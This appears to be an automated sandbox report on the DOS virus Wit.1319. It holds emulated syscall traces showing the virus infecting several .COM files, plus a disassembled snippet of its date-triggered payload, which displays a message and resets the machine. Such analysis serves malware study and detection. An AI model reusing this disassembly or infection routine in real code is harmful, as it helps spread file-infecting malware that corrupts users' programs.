Sample viewer

vx.netlux.org/Virus.DOS.Wit.1319


Syscalls:

Time Syscall Op Syscall Name
2018-12-17T23:11:15.402020977Z 26 PC: 12ad9 | Set disk transfer address
2018-12-17T23:11:15.404107898Z 71 PC: 12aeb | Get current directory
2018-12-17T23:11:15.407230088Z 42 PC: 12af1 | Get date
0x12af1: cmp dh, 4
0x12af4: jne 0x12b0f
0x12af6: cmp dl, 0xf
0x12af9: jne 0x12b0f
0x12afb: mov ax, 0x1010
0x12afe: out 0x70, ax
0x12b00: mov dx, 0x505
0x12b03: mov ah, 9
0x12b05: int 0x21
0x12b07: mov ah, 8
0x12b09: int 0x21
0x12b0b: mov al, 0xfe
0x12b0d: out 0x64, al
0x12b0f: mov dx, 0x4f3
0x12b12: mov ah, byte ptr [0x5e9]
0x12b16: mov cl, 7
0x12b18: int 0x21
0x12b1a: jae 0x12b1f
0x12b1c: jmp 0x12d8f
0x12b1f: mov dx, word ptr [0x528]
2018-12-17T23:11:15.409404678Z 78 PC: 12b1a | Find first file
2018-12-17T23:11:15.417867379Z 67 PC: 12b36 | Get or set file attributes
2018-12-17T23:11:15.439936622Z 61 PC: 12b58 | Open file (Filename = 'SLEEP.COM')
2018-12-17T23:11:15.446823415Z 63 PC: 12b74 | Read file or device (Read 1316 bytes on handle 5)
2018-12-17T23:11:15.454343428Z 66 PC: 12b9f | Move file pointer
2018-12-17T23:11:15.455845407Z 66 PC: 12bc0 | Move file pointer
2018-12-17T23:11:15.457205651Z 64 PC: 12bdb | Write file or device (Write 407 bytes on handle 5)
2018-12-17T23:11:15.466217994Z 64 PC: 12beb | Write file or device (Write 3 bytes on handle 5)
2018-12-17T23:11:15.469342462Z 66 PC: 12c31 | Move file pointer
2018-12-17T23:11:15.47096922Z 64 PC: 12c42 | Write file or device (Write 1316 bytes on handle 5)
2018-12-17T23:11:15.479507971Z 87 PC: 12c53 | Get or set file date and time
2018-12-17T23:11:15.48185207Z 67 PC: 12c65 | Get or set file attributes
2018-12-17T23:11:15.492265324Z 62 PC: 12c6b | Close file
2018-12-17T23:11:15.499417209Z 79 PC: 12b1a | Find next file
2018-12-17T23:11:15.503094988Z 67 PC: 12b36 | Get or set file attributes
2018-12-17T23:11:15.512857491Z 61 PC: 12b58 | Open file (Filename = 'PRINT.COM')
2018-12-17T23:11:15.519513254Z 63 PC: 12b74 | Read file or device (Read 1316 bytes on handle 5)
2018-12-17T23:11:15.526834019Z 66 PC: 12b9f | Move file pointer
2018-12-17T23:11:15.528543012Z 66 PC: 12bc0 | Move file pointer
2018-12-17T23:11:15.530997359Z 64 PC: 12bdb | Write file or device (Write 27 bytes on handle 5)
2018-12-17T23:11:15.536328034Z 64 PC: 12beb | Write file or device (Write 3 bytes on handle 5)
2018-12-17T23:11:15.539983282Z 66 PC: 12c31 | Move file pointer
2018-12-17T23:11:15.541754037Z 64 PC: 12c42 | Write file or device (Write 1316 bytes on handle 5)
2018-12-17T23:11:15.552080148Z 87 PC: 12c53 | Get or set file date and time
2018-12-17T23:11:15.55410601Z 67 PC: 12c65 | Get or set file attributes
2018-12-17T23:11:15.565457992Z 62 PC: 12c6b | Close file
2018-12-17T23:11:15.5732753Z 79 PC: 12b1a | Find next file
2018-12-17T23:11:15.576320353Z 67 PC: 12b36 | Get or set file attributes
2018-12-17T23:11:15.586331805Z 61 PC: 12b58 | Open file (Filename = 'HELLO.COM')
2018-12-17T23:11:15.593710021Z 63 PC: 12b74 | Read file or device (Read 1316 bytes on handle 5)
2018-12-17T23:11:15.600879309Z 66 PC: 12b9f | Move file pointer
2018-12-17T23:11:15.602642908Z 66 PC: 12bc0 | Move file pointer
2018-12-17T23:11:15.604367837Z 64 PC: 12bdb | Write file or device (Write 92 bytes on handle 5)
2018-12-17T23:11:15.609005249Z 64 PC: 12beb | Write file or device (Write 3 bytes on handle 5)
2018-12-17T23:11:15.612106338Z 66 PC: 12c31 | Move file pointer
2018-12-17T23:11:15.613734621Z 64 PC: 12c42 | Write file or device (Write 1316 bytes on handle 5)
2018-12-17T23:11:15.622176816Z 87 PC: 12c53 | Get or set file date and time
2018-12-17T23:11:15.623643042Z 67 PC: 12c65 | Get or set file attributes
2018-12-17T23:11:15.634951943Z 62 PC: 12c6b | Close file
2018-12-17T23:11:15.642686953Z 79 PC: 12b1a | Find next file
2018-12-17T23:11:15.645700938Z 67 PC: 12b36 | Get or set file attributes
2018-12-17T23:11:15.65606918Z 61 PC: 12b58 | Open file (Filename = 'PHANG.COM')
2018-12-17T23:11:15.663433271Z 63 PC: 12b74 | Read file or device (Read 1316 bytes on handle 5)
2018-12-17T23:11:15.670394786Z 66 PC: 12b9f | Move file pointer
2018-12-17T23:11:15.672185475Z 66 PC: 12bc0 | Move file pointer
2018-12-17T23:11:15.67448731Z 64 PC: 12bdb | Write file or device (Write 29 bytes on handle 5)
2018-12-17T23:11:15.678533472Z 64 PC: 12beb | Write file or device (Write 3 bytes on handle 5)
2018-12-17T23:11:15.681650607Z 66 PC: 12c31 | Move file pointer
2018-12-17T23:11:15.683790046Z 64 PC: 12c42 | Write file or device (Write 1316 bytes on handle 5)
2018-12-17T23:11:15.691484591Z 87 PC: 12c53 | Get or set file date and time
2018-12-17T23:11:15.693135882Z 67 PC: 12c65 | Get or set file attributes
2018-12-17T23:11:15.703997523Z 62 PC: 12c6b | Close file
2018-12-17T23:11:15.71144843Z 79 PC: 12b1a | Find next file
2018-12-17T23:11:15.714950607Z 67 PC: 12b36 | Get or set file attributes
2018-12-17T23:11:15.727389615Z 61 PC: 12b58 | Open file (Filename = 'PRINTA~1.COM')
2018-12-17T23:11:15.735465325Z 63 PC: 12b74 | Read file or device (Read 1316 bytes on handle 5)
2018-12-17T23:11:15.742447688Z 66 PC: 12b9f | Move file pointer
2018-12-17T23:11:15.745609096Z 66 PC: 12bc0 | Move file pointer
2018-12-17T23:11:15.747662889Z 64 PC: 12bdb | Write file or device (Write 29 bytes on handle 5)
2018-12-17T23:11:15.751935546Z 64 PC: 12beb | Write file or device (Write 3 bytes on handle 5)
2018-12-17T23:11:15.756021138Z 66 PC: 12c31 | Move file pointer
2018-12-17T23:11:15.758165369Z 64 PC: 12c42 | Write file or device (Write 1316 bytes on handle 5)
2018-12-17T23:11:15.766979863Z 87 PC: 12c53 | Get or set file date and time
2018-12-17T23:11:15.769668622Z 67 PC: 12c65 | Get or set file attributes
2018-12-17T23:11:15.780726309Z 62 PC: 12c6b | Close file
2018-12-17T23:11:15.787910823Z 78 PC: 12b1a | Find first file
2018-12-17T23:11:15.795342963Z 78 PC: 12cd0 | Find first file
2018-12-17T23:11:15.802133708Z 78 PC: 12cd0 | Find first file
2018-12-17T23:11:15.808263812Z 78 PC: 12cd0 | Find first file
2018-12-17T23:11:15.814886791Z 78 PC: 12cd0 | Find first file
2018-12-17T23:11:15.821698487Z 78 PC: 12cd0 | Find first file
2018-12-17T23:11:15.828010327Z 78 PC: 12cd0 | Find first file
2018-12-17T23:11:15.83426106Z 78 PC: 12cd0 | Find first file
2018-12-17T23:11:15.841082013Z 78 PC: 12cd0 | Find first file
2018-12-17T23:11:15.84701628Z 78 PC: 12cd0 | Find first file
2018-12-17T23:11:15.852928284Z 59 PC: 12db4 | Change current directory
2018-12-17T23:11:15.858262236Z 26 PC: 12dd1 | Set disk transfer address
2018-12-17T23:11:15.859593847Z 59 PC: 12ddc | Change current directory

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":17132,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:54:58.684793774Z 26 PC: 12ad9 | Set disk transfer address
2018-12-25T12:54:58.686269073Z 71 PC: 12aeb | Get current directory
2018-12-25T12:54:58.688320631Z 42 PC: 12af1 | Get date
0x12af1: cmp dh, 4
0x12af4: jne 0x12b0f
0x12af6: cmp dl, 0xf
0x12af9: jne 0x12b0f
0x12afb: mov ax, 0x1010
0x12afe: out 0x70, ax
0x12b00: mov dx, 0x505
0x12b03: mov ah, 9
0x12b05: int 0x21
0x12b07: mov ah, 8
0x12b09: int 0x21
0x12b0b: mov al, 0xfe
0x12b0d: out 0x64, al
0x12b0f: mov dx, 0x4f3
0x12b12: mov ah, byte ptr [0x5e9]
0x12b16: mov cl, 7
0x12b18: int 0x21
0x12b1a: jae 0x12b1f
0x12b1c: jmp 0x12d8f
0x12b1f: mov dx, word ptr [0x528]
2018-12-25T12:54:58.690605297Z 78 PC: 12b1a | Find first file
2018-12-25T12:54:58.697538721Z 67 PC: 12b36 | Get or set file attributes
2018-12-25T12:54:58.711606106Z 61 PC: 12b58 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:54:58.715887632Z 63 PC: 12b74 | Read file or device (Read 1316 bytes on handle 5)
2018-12-25T12:54:58.720193567Z 66 PC: 12b9f | Move file pointer
2018-12-25T12:54:58.721963369Z 66 PC: 12bc0 | Move file pointer
2018-12-25T12:54:58.723088631Z 64 PC: 12bdb | Write file or device (Write 407 bytes on handle 5)
2018-12-25T12:54:58.728348572Z 64 PC: 12beb | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:54:58.731144305Z 66 PC: 12c31 | Move file pointer
2018-12-25T12:54:58.732195751Z 64 PC: 12c42 | Write file or device (Write 1316 bytes on handle 5)
2018-12-25T12:54:58.737560773Z 87 PC: 12c53 | Get or set file date and time
2018-12-25T12:54:58.739049164Z 67 PC: 12c65 | Get or set file attributes
2018-12-25T12:54:58.746184894Z 62 PC: 12c6b | Close file
2018-12-25T12:54:58.752704563Z 79 PC: 12b1a | Find next file (See above)
2018-12-25T12:54:58.755081516Z 67 PC: 12b36 | Get or set file attributes (See above)
2018-12-25T12:54:58.761829129Z 61 PC: 12b58 | Open file (See above)
2018-12-25T12:54:58.766229069Z 63 PC: 12b74 | Read file or device (See above)
2018-12-25T12:54:58.770783115Z 66 PC: 12b9f | Move file pointer (See above)
2018-12-25T12:54:58.772667663Z 66 PC: 12bc0 | Move file pointer (See above)
2018-12-25T12:54:58.773877486Z 64 PC: 12bdb | Write file or device (See above)
2018-12-25T12:54:58.776546547Z 64 PC: 12beb | Write file or device (See above)
2018-12-25T12:54:58.77917729Z 66 PC: 12c31 | Move file pointer (See above)
2018-12-25T12:54:58.780699729Z 64 PC: 12c42 | Write file or device (See above)
2018-12-25T12:54:58.785789756Z 87 PC: 12c53 | Get or set file date and time (See above)
2018-12-25T12:54:58.787833393Z 67 PC: 12c65 | Get or set file attributes (See above)
2018-12-25T12:54:58.795312996Z 62 PC: 12c6b | Close file (See above)
2018-12-25T12:54:58.80012202Z 79 PC: 12b1a | Find next file (See above)
2018-12-25T12:54:58.80409202Z 67 PC: 12b36 | Get or set file attributes (See above)
2018-12-25T12:54:58.815365538Z 61 PC: 12b58 | Open file (See above)
2018-12-25T12:54:58.823599654Z 63 PC: 12b74 | Read file or device (See above)
2018-12-25T12:54:58.82996583Z 66 PC: 12b9f | Move file pointer (See above)
2018-12-25T12:54:58.831961567Z 66 PC: 12bc0 | Move file pointer (See above)
2018-12-25T12:54:58.833884732Z 64 PC: 12bdb | Write file or device (See above)
2018-12-25T12:54:58.839353865Z 64 PC: 12beb | Write file or device (See above)
2018-12-25T12:54:58.843080537Z 66 PC: 12c31 | Move file pointer (See above)
2018-12-25T12:54:58.844962884Z 64 PC: 12c42 | Write file or device (See above)
2018-12-25T12:54:58.853563294Z 87 PC: 12c53 | Get or set file date and time (See above)
2018-12-25T12:54:58.855606244Z 67 PC: 12c65 | Get or set file attributes (See above)
2018-12-25T12:54:58.867183716Z 62 PC: 12c6b | Close file (See above)
2018-12-25T12:54:58.87482282Z 79 PC: 12b1a | Find next file (See above)
2018-12-25T12:54:58.878765793Z 67 PC: 12b36 | Get or set file attributes (See above)
2018-12-25T12:54:58.890642166Z 61 PC: 12b58 | Open file (See above)
2018-12-25T12:54:58.899082231Z 63 PC: 12b74 | Read file or device (See above)
2018-12-25T12:54:58.907063377Z 66 PC: 12b9f | Move file pointer (See above)
2018-12-25T12:54:58.908746392Z 66 PC: 12bc0 | Move file pointer (See above)
2018-12-25T12:54:58.91032772Z 64 PC: 12bdb | Write file or device (See above)
2018-12-25T12:54:58.914905373Z 64 PC: 12beb | Write file or device (See above)
2018-12-25T12:54:58.917930185Z 66 PC: 12c31 | Move file pointer (See above)
2018-12-25T12:54:58.919301963Z 64 PC: 12c42 | Write file or device (See above)
2018-12-25T12:54:58.928739937Z 87 PC: 12c53 | Get or set file date and time (See above)
2018-12-25T12:54:58.930389156Z 67 PC: 12c65 | Get or set file attributes (See above)
2018-12-25T12:54:58.942894862Z 62 PC: 12c6b | Close file (See above)
2018-12-25T12:54:58.950782374Z 79 PC: 12b1a | Find next file (See above)
2018-12-25T12:54:58.953586989Z 67 PC: 12b36 | Get or set file attributes (See above)
2018-12-25T12:54:58.96460773Z 61 PC: 12b58 | Open file (See above)
2018-12-25T12:54:58.972446494Z 63 PC: 12b74 | Read file or device (See above)
2018-12-25T12:54:58.979518973Z 66 PC: 12b9f | Move file pointer (See above)
2018-12-25T12:54:58.981485932Z 66 PC: 12bc0 | Move file pointer (See above)
2018-12-25T12:54:58.983645669Z 64 PC: 12bdb | Write file or device (See above)
2018-12-25T12:54:58.987900679Z 64 PC: 12beb | Write file or device (See above)
2018-12-25T12:54:58.990898353Z 66 PC: 12c31 | Move file pointer (See above)
2018-12-25T12:54:58.992185798Z 64 PC: 12c42 | Write file or device (See above)
2018-12-25T12:54:59.002003894Z 87 PC: 12c53 | Get or set file date and time (See above)
2018-12-25T12:54:59.004138873Z 67 PC: 12c65 | Get or set file attributes (See above)
2018-12-25T12:54:59.016502771Z 62 PC: 12c6b | Close file (See above)
2018-12-25T12:54:59.026138879Z 78 PC: 12b1a | Find first file (See above)
2018-12-25T12:54:59.032564558Z 78 PC: 12cd0 | Find first file
2018-12-25T12:54:59.039143867Z 78 PC: 12cd0 | Find first file (See above)
2018-12-25T12:54:59.046212554Z 78 PC: 12cd0 | Find first file (See above)
2018-12-25T12:54:59.05281082Z 78 PC: 12cd0 | Find first file (See above)
2018-12-25T12:54:59.06500592Z 78 PC: 12cd0 | Find first file (See above)
2018-12-25T12:54:59.07848023Z 78 PC: 12cd0 | Find first file (See above)
2018-12-25T12:54:59.085982719Z 78 PC: 12cd0 | Find first file (See above)
2018-12-25T12:54:59.092541041Z 78 PC: 12cd0 | Find first file (See above)
2018-12-25T12:54:59.099312674Z 78 PC: 12cd0 | Find first file (See above)
2018-12-25T12:54:59.106730512Z 59 PC: 12db4 | Change current directory
2018-12-25T12:54:59.111537206Z 26 PC: 12dd1 | Set disk transfer address
2018-12-25T12:54:59.113083204Z 59 PC: 12ddc | Change current directory

{"DateBased":true,"Day":1,"Month":4,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":17132,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:54:59.391247624Z 26 PC: 12ad9 | Set disk transfer address
2018-12-25T12:54:59.39315955Z 71 PC: 12aeb | Get current directory
2018-12-25T12:54:59.396472237Z 42 PC: 12af1 | Get date
0x12af1: cmp dh, 4
0x12af4: jne 0x12b0f
0x12af6: cmp dl, 0xf
0x12af9: jne 0x12b0f
0x12afb: mov ax, 0x1010
0x12afe: out 0x70, ax
0x12b00: mov dx, 0x505
0x12b03: mov ah, 9
0x12b05: int 0x21
0x12b07: mov ah, 8
0x12b09: int 0x21
0x12b0b: mov al, 0xfe
0x12b0d: out 0x64, al
0x12b0f: mov dx, 0x4f3
0x12b12: mov ah, byte ptr [0x5e9]
0x12b16: mov cl, 7
0x12b18: int 0x21
0x12b1a: jae 0x12b1f
0x12b1c: jmp 0x12d8f
0x12b1f: mov dx, word ptr [0x528]
2018-12-25T12:54:59.399663599Z 78 PC: 12b1a | Find first file
2018-12-25T12:54:59.406823793Z 67 PC: 12b36 | Get or set file attributes
2018-12-25T12:54:59.60939655Z 61 PC: 12b58 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:54:59.617001809Z 63 PC: 12b74 | Read file or device (Read 1316 bytes on handle 5)
2018-12-25T12:54:59.624495281Z 66 PC: 12b9f | Move file pointer
2018-12-25T12:54:59.626924556Z 66 PC: 12bc0 | Move file pointer
2018-12-25T12:54:59.628536506Z 64 PC: 12bdb | Write file or device (Write 407 bytes on handle 5)
2018-12-25T12:54:59.637645403Z 64 PC: 12beb | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:54:59.641827004Z 66 PC: 12c31 | Move file pointer
2018-12-25T12:54:59.6440695Z 64 PC: 12c42 | Write file or device (Write 1316 bytes on handle 5)
2018-12-25T12:54:59.654784688Z 87 PC: 12c53 | Get or set file date and time
2018-12-25T12:54:59.665450851Z 67 PC: 12c65 | Get or set file attributes
2018-12-25T12:54:59.677700926Z 62 PC: 12c6b | Close file
2018-12-25T12:54:59.685746324Z 79 PC: 12b1a | Find next file (See above)
2018-12-25T12:54:59.689357613Z 67 PC: 12b36 | Get or set file attributes (See above)
2018-12-25T12:54:59.697204894Z 61 PC: 12b58 | Open file (See above)
2018-12-25T12:54:59.701455876Z 63 PC: 12b74 | Read file or device (See above)
2018-12-25T12:54:59.705640242Z 66 PC: 12b9f | Move file pointer (See above)
2018-12-25T12:54:59.707720226Z 66 PC: 12bc0 | Move file pointer (See above)
2018-12-25T12:54:59.709024139Z 64 PC: 12bdb | Write file or device (See above)
2018-12-25T12:54:59.711694602Z 64 PC: 12beb | Write file or device (See above)
2018-12-25T12:54:59.714205739Z 66 PC: 12c31 | Move file pointer (See above)
2018-12-25T12:54:59.715471223Z 64 PC: 12c42 | Write file or device (See above)
2018-12-25T12:54:59.720695669Z 87 PC: 12c53 | Get or set file date and time (See above)
2018-12-25T12:54:59.722827809Z 67 PC: 12c65 | Get or set file attributes (See above)
2018-12-25T12:54:59.735408673Z 62 PC: 12c6b | Close file (See above)
2018-12-25T12:54:59.743449776Z 79 PC: 12b1a | Find next file (See above)
2018-12-25T12:54:59.747816818Z 67 PC: 12b36 | Get or set file attributes (See above)
2018-12-25T12:54:59.758805626Z 61 PC: 12b58 | Open file (See above)
2018-12-25T12:54:59.76633279Z 63 PC: 12b74 | Read file or device (See above)
2018-12-25T12:54:59.773317271Z 66 PC: 12b9f | Move file pointer (See above)
2018-12-25T12:54:59.775068057Z 66 PC: 12bc0 | Move file pointer (See above)
2018-12-25T12:54:59.776623247Z 64 PC: 12bdb | Write file or device (See above)
2018-12-25T12:54:59.780856448Z 64 PC: 12beb | Write file or device (See above)
2018-12-25T12:54:59.784586143Z 66 PC: 12c31 | Move file pointer (See above)
2018-12-25T12:54:59.786384343Z 64 PC: 12c42 | Write file or device (See above)
2018-12-25T12:54:59.795513383Z 87 PC: 12c53 | Get or set file date and time (See above)
2018-12-25T12:54:59.798089293Z 67 PC: 12c65 | Get or set file attributes (See above)
2018-12-25T12:54:59.810726625Z 62 PC: 12c6b | Close file (See above)
2018-12-25T12:54:59.819462476Z 79 PC: 12b1a | Find next file (See above)
2018-12-25T12:54:59.823652258Z 67 PC: 12b36 | Get or set file attributes (See above)
2018-12-25T12:54:59.834820206Z 61 PC: 12b58 | Open file (See above)
2018-12-25T12:54:59.842128129Z 63 PC: 12b74 | Read file or device (See above)
2018-12-25T12:54:59.849581305Z 66 PC: 12b9f | Move file pointer (See above)
2018-12-25T12:54:59.851367889Z 66 PC: 12bc0 | Move file pointer (See above)
2018-12-25T12:54:59.852918116Z 64 PC: 12bdb | Write file or device (See above)
2018-12-25T12:54:59.857197098Z 64 PC: 12beb | Write file or device (See above)
2018-12-25T12:54:59.860845822Z 66 PC: 12c31 | Move file pointer (See above)
2018-12-25T12:54:59.862329337Z 64 PC: 12c42 | Write file or device (See above)
2018-12-25T12:54:59.871021078Z 87 PC: 12c53 | Get or set file date and time (See above)
2018-12-25T12:54:59.873096073Z 67 PC: 12c65 | Get or set file attributes (See above)
2018-12-25T12:54:59.88444149Z 62 PC: 12c6b | Close file (See above)
2018-12-25T12:54:59.891825714Z 79 PC: 12b1a | Find next file (See above)
2018-12-25T12:54:59.895221443Z 67 PC: 12b36 | Get or set file attributes (See above)
2018-12-25T12:54:59.905706684Z 61 PC: 12b58 | Open file (See above)
2018-12-25T12:54:59.916914657Z 63 PC: 12b74 | Read file or device (See above)
2018-12-25T12:54:59.926895172Z 66 PC: 12b9f | Move file pointer (See above)
2018-12-25T12:54:59.929011899Z 66 PC: 12bc0 | Move file pointer (See above)
2018-12-25T12:54:59.930995218Z 64 PC: 12bdb | Write file or device (See above)
2018-12-25T12:54:59.937473523Z 64 PC: 12beb | Write file or device (See above)
2018-12-25T12:54:59.940993134Z 66 PC: 12c31 | Move file pointer (See above)
2018-12-25T12:54:59.94289295Z 64 PC: 12c42 | Write file or device (See above)
2018-12-25T12:54:59.952756977Z 87 PC: 12c53 | Get or set file date and time (See above)
2018-12-25T12:54:59.955244112Z 67 PC: 12c65 | Get or set file attributes (See above)
2018-12-25T12:54:59.967295252Z 62 PC: 12c6b | Close file (See above)
2018-12-25T12:54:59.975224997Z 78 PC: 12b1a | Find first file (See above)
2018-12-25T12:54:59.982599675Z 78 PC: 12cd0 | Find first file
2018-12-25T12:54:59.990189779Z 78 PC: 12cd0 | Find first file (See above)
2018-12-25T12:54:59.997896157Z 78 PC: 12cd0 | Find first file (See above)
2018-12-25T12:55:00.005729078Z 78 PC: 12cd0 | Find first file (See above)
2018-12-25T12:55:00.012269253Z 78 PC: 12cd0 | Find first file (See above)
2018-12-25T12:55:00.020638255Z 78 PC: 12cd0 | Find first file (See above)
2018-12-25T12:55:00.028395755Z 78 PC: 12cd0 | Find first file (See above)
2018-12-25T12:55:00.035593807Z 78 PC: 12cd0 | Find first file (See above)
2018-12-25T12:55:00.042907752Z 78 PC: 12cd0 | Find first file (See above)
2018-12-25T12:55:00.050208029Z 59 PC: 12db4 | Change current directory
2018-12-25T12:55:00.054878004Z 26 PC: 12dd1 | Set disk transfer address
2018-12-25T12:55:00.056165829Z 59 PC: 12ddc | Change current directory

{"DateBased":true,"Day":15,"Month":4,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":17132,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:54:59.548922503Z 26 PC: 12ad9 | Set disk transfer address
2018-12-25T12:54:59.551301947Z 71 PC: 12aeb | Get current directory
2018-12-25T12:54:59.554884787Z 42 PC: 12af1 | Get date
0x12af1: cmp dh, 4
0x12af4: jne 0x12b0f
0x12af6: cmp dl, 0xf
0x12af9: jne 0x12b0f
0x12afb: mov ax, 0x1010
0x12afe: out 0x70, ax
0x12b00: mov dx, 0x505
0x12b03: mov ah, 9
0x12b05: int 0x21
0x12b07: mov ah, 8
0x12b09: int 0x21
0x12b0b: mov al, 0xfe
0x12b0d: out 0x64, al
0x12b0f: mov dx, 0x4f3
0x12b12: mov ah, byte ptr [0x5e9]
0x12b16: mov cl, 7
0x12b18: int 0x21
0x12b1a: jae 0x12b1f
0x12b1c: jmp 0x12d8f
0x12b1f: mov dx, word ptr [0x528]
2018-12-25T12:54:59.557668632Z 9 PC: 12b07 | Display string (String= '��ࠡ���� - rulez forever ! ')
2018-12-25T12:54:59.562604354Z 8 PC: 12b0b | Console input without echo